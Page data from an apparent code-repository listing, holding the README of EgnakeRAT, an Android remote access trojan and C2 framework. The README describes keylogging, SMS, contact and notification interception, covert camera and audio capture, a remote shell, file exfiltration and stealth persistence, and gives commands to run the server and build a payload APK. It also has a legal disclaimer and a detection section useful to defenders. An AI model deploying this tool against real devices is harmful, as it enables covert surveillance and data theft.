[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-81691":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":14,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":15,"stars7d":16,"stars30d":17,"stars90d":15,"forks30d":15,"starsTrendScore":15,"compositeScore":18,"rankGlobal":10,"rankLanguage":10,"license":19,"archived":20,"fork":20,"defaultBranch":21,"hasWiki":22,"hasPages":20,"topics":23,"createdAt":10,"pushedAt":10,"updatedAt":41,"readmeContent":42,"aiSummary":43,"trendingCount":15,"starSnapshotCount":15,"syncStatus":44,"lastSyncTime":45,"discoverSource":46},81691,"EgnakeRAT","egnake\u002FEgnakeRAT","egnake","Advanced, asynchronous Android Command & Control (C2) framework featuring AES-256-CBC encryption, DOM-based keylogging, and E2EE notification interception. Built for Red Team operations and mobile security research.","",null,"Java",27,7,1,0,3,4,44.61,"MIT License",false,"main",true,[24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40],"android","flask","hack","hacking","mobile","mobile-app","pentest","pentest-tool","pentesting","pentesting-tools","python","python-script","python3","rat-builder","rat-fud","redteam","websocket","2026-06-12 04:01:34","\u003Cdiv align=\"center\">\n\n```\n ╔══════════════════════════════════════════════════════════════════════════════╗\n ║ ███████╗ ██████╗ ███╗ ██╗ █████╗ ██╗ ██╗███████╗██████╗ █████╗ ████████╗ ║\n ║ ██╔════╝██╔════╝ ████╗ ██║██╔══██╗██║ ██╔╝██╔════╝██╔══██╗██╔══██╗╚══██╔══╝ ║\n ║ █████╗ ██║ ███╗██╔██╗ ██║███████║█████╔╝ █████╗ ██████╔╝███████║ ██║ ║\n ║ ██╔══╝ ██║ ██║██║╚██╗██║██╔══██║██╔═██╗ ██╔══╝ ██╔══██╗██╔══██║ ██║ ║\n ║ ███████╗╚██████╔╝██║ ╚████║██║ ██║██║ ██╗███████╗██║ ██║██║ ██║ ██║ ║\n ║ ╚══════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ║\n ╚══════════════════════════════════════════════════════════════════════════════╝\n```\n\n**Advanced Android C2 Framework · AES-256 Encrypted · Real-Time Web Dashboard**\n\n[![Python](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FPython-3.10+-3776AB?style=flat-square&logo=python&logoColor=white)](https:\u002F\u002Fpython.org)\n[![Platform](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FTarget-Android-3DDC84?style=flat-square&logo=android&logoColor=white)](https:\u002F\u002Fdeveloper.android.com)\n[![Encryption](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FCrypto-AES--256--CBC-red?style=flat-square&logo=letsencrypt&logoColor=white)]()\n[![License](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLicense-Educational-yellow?style=flat-square)]()\n[![Status](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FStatus-Active-success?style=flat-square)]()\n\n\u003C\u002Fdiv>\n\n---\n\n> **⚠️ LEGAL DISCLAIMER — READ BEFORE USE**\n>\n> EgnakeRAT is a **Remote Administration Tool (RAT)** built strictly for **authorized penetration testing**, **red team operations**, and **academic security research**. Deploying this tool on systems or devices **without explicit written consent** from the owner is **illegal** and may violate laws including but not limited to the **Computer Fraud and Abuse Act (CFAA)**, **GDPR**, and equivalent legislation in your jurisdiction.\n>\n> **The author assumes no liability for misuse.** By using this software, you agree that you are solely responsible for compliance with all applicable laws. This project is provided as-is for educational purposes only.\n\n---\n\n## Architecture\n\n```\n┌─────────────────────────────────────────────────────────────┐\n│ EgnakeRAT │\n├──────────────────┬──────────────────┬───────────────────────┤\n│ C2 TCP Server │ Web Dashboard │ Android Client │\n│ (asyncio) │ (Flask+SIO) │ (Java\u002FKotlin) │\n├──────────────────┼──────────────────┼───────────────────────┤\n│ StreamReader\u002F │ REST API │ Persistent Service │\n│ StreamWriter │ Socket.IO WS │ Accessibility Svc │\n│ Coroutine-per- │ Real-time events │ Auto-reconnect │\n│ connection │ │ Stealth mode │\n├──────────────────┴──────────────────┴───────────────────────┤\n│ Shared Layer │\n│ ┌──────────┐ ┌───────────────┐ ┌───────────────────┐ │\n│ │ Protocol │ │ CryptoManager │ │ Database (SQLite) │ │\n│ │ JSON+LPF │ │ AES-256-CBC │ │ WAL mode │ │\n│ └──────────┘ └───────────────┘ └───────────────────┘ │\n└─────────────────────────────────────────────────────────────┘\n```\n\n## Features\n\n### C2 Server\n- **Fully asynchronous** — built on `asyncio.start_server`, handles thousands of concurrent connections with minimal memory\n- **AES-256-CBC encrypted** communications with SHA-256 key derivation\n- **Length-prefixed JSON protocol** — 4-byte big-endian header + encrypted payload, max 50MB per message\n- **Automatic reconnection handling** — stale sessions are cleaned up, old connections gracefully terminated\n- **Ngrok tunnel support** — built-in TCP tunneling for external access\n\n### Web Dashboard\n- **Real-time device management** via Socket.IO WebSocket events\n- **Dark glassmorphism UI** with Lucide icons, Inter\u002FJetBrains Mono typography\n- **Modules:** Tactical commands, Remote shell, Keylogger, Screen stream, Notification intercept, File exfiltration, Audit log\n- **Payload generator** — configure and patch Android APK directly from the browser\n- **Global map** — Leaflet.js powered device geolocation tracking\n\n### Android Client Capabilities\n| Category | Commands |\n|---|---|\n| **Reconnaissance** | `deviceInfo`, `getBatteryStatus`, `getWifiInfo`, `getIP`, `getMACAddress`, `getSimDetails`, `getInstalledApps`, `getClipData` |\n| **Surveillance** | `getLocation`, `getSMS`, `getCallLogs`, `getContacts`, `getNotifications` |\n| **Media** | `camList`, `takepic`, `screenshot`, `startAudio\u002FstopAudio`, `startVideo\u002FstopVideo` |\n| **Live Interaction** | `startScreenStream\u002FstopScreenStream`, `makeCall`, `sendSMS`, `openUrl`, `showToast`, `vibrate`, `lockScreen` |\n| **Shell & Files** | `shell`, `shellCmd`, `fileList`, `fileDownload`, `fileUpload`, `fileDelete` |\n| **Accessibility** | `startKeylogger\u002FstopKeylogger`, `readScreen`, `performAction`, `checkAccessibility`, `enableAccessibility` |\n\n### Wire Protocol\n\n```\n┌────────────┬──────────────────────────────────┐\n│ 4 bytes │ N bytes │\n│ Length (BE)│ AES-256-CBC(JSON payload) │\n└────────────┴──────────────────────────────────┘\n```\n\nEvery message is a JSON object with a `type` field. The payload is encrypted with AES-256-CBC (random IV prepended), then base64-encoded, then length-prefixed with a 4-byte big-endian integer.\n\n**Handshake flow:**\n1. Client connects via TCP\n2. Client sends `handshake` message with `device_id`, `model`, `android_version`, `key_hash`\n3. Server verifies `key_hash` matches `MD5(SHA256(passphrase))`\n4. Server responds with `handshake_ack`\n5. Client enters heartbeat loop, server can issue commands at any time\n\n## Setup\n\n### Requirements\n- Python 3.10+\n- Android Studio (for APK building)\n\n### Installation\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fuser\u002FEgnakeRAT.git\ncd EgnakeRAT\npip install -r requirements.txt\n```\n\n### Start the C2 Server\n\n```bash\n# Default: C2 on port 8000, Dashboard on port 8080\npython EgnakeRAT.py server\n\n# Custom ports\npython EgnakeRAT.py server -p 9000 -w 3000\n\n# With ngrok tunnel (for external access)\npython EgnakeRAT.py server --ngrok\n\n# Custom encryption key\npython EgnakeRAT.py server -k \"YourSecurePassphrase\"\n```\n\nAccess the dashboard at `http:\u002F\u002Flocalhost:8080`\n\n### Build the Android Payload\n\n```bash\n# Configure APK with target IP and port\npython EgnakeRAT.py build -i 192.168.1.100 -p 8000\n\n# With ngrok\npython EgnakeRAT.py build --ngrok\n\n# Custom encryption key\npython EgnakeRAT.py build -i 10.0.0.5 -p 8000 -k \"YourSecurePassphrase\"\n```\n\nThen open `Android_Code\u002F` in Android Studio and run `Build → Generate Signed APK` or:\n```bash\ncd Android_Code && .\u002Fgradlew assembleRelease\n```\n\n## Project Structure\n\n```\nEgnakeRAT\u002F\n├── EgnakeRAT.py # Entry point (server + build CLI)\n├── requirements.txt\n├── server\u002F\n│ ├── c2_server.py # Async TCP C2 server + client handler\n│ ├── protocol.py # Wire protocol constants + pack\u002Funpack\n│ ├── crypto.py # AES-256-CBC encryption engine\n│ ├── database.py # SQLite database (WAL mode)\n│ ├── logger.py # Rich console + file logging\n│ └── web\u002F\n│ ├── app.py # Flask + Socket.IO web dashboard\n│ ├── static\u002F\n│ │ ├── css\u002Fdashboard.css\n│ │ └── js\u002Fdashboard.js\n│ └── templates\u002F\n│ └── index.html\n├── Android_Code\u002F # Android client source (Java)\n├── Dumps\u002F # Exfiltrated files (per-device dirs)\n└── logs\u002F # Server logs (daily rotation)\n```\n\n## Database Schema\n\n| Table | Purpose |\n|---|---|\n| `devices` | Device registry (model, OS, IP, battery, WiFi, online status) |\n| `command_history` | Full command audit trail with timestamps |\n| `files` | Metadata for exfiltrated files |\n| `sessions` | Connection sessions with connect\u002Fdisconnect timestamps |\n| `keylogs` | Captured keystrokes by application |\n| `notifications` | Intercepted device notifications |\n\n## Defense & Detection\n\nUnderstanding how this tool operates is essential for defensive security:\n\n- **Network indicators** — Persistent TCP connection to a non-standard port with encrypted (non-TLS) traffic\n- **Accessibility service abuse** — Monitor which apps request `BIND_ACCESSIBILITY_SERVICE` permission\n- **Battery drain patterns** — Screen streaming and continuous keylogging increase power consumption\n- **APK analysis** — Hardcoded C2 IP\u002Fport and AES key can be extracted via static analysis of the APK\n\nThis project is released for **educational and authorized security research purposes only**. No warranty is provided. Use at your own risk and responsibility.\n","EgnakeRAT 是一个高级的异步Android命令与控制(C2)框架,专为红队行动和移动安全研究设计。它采用AES-256-CBC加密技术、基于DOM的键盘记录以及端到端加密的通知拦截等核心功能,确保数据传输的安全性和隐蔽性。该工具利用Java语言开发客户端,并结合Python(Flask + Socket.IO)构建了实时响应的Web仪表板,支持WebSocket协议实现高效通信。适用于授权的渗透测试场景,帮助研究人员评估Android设备的安全性。请注意,使用本软件必须遵守相关法律法规,仅限于合法授权的安全测试活动。",2,"2026-06-11 04:05:59","CREATED_QUERY"]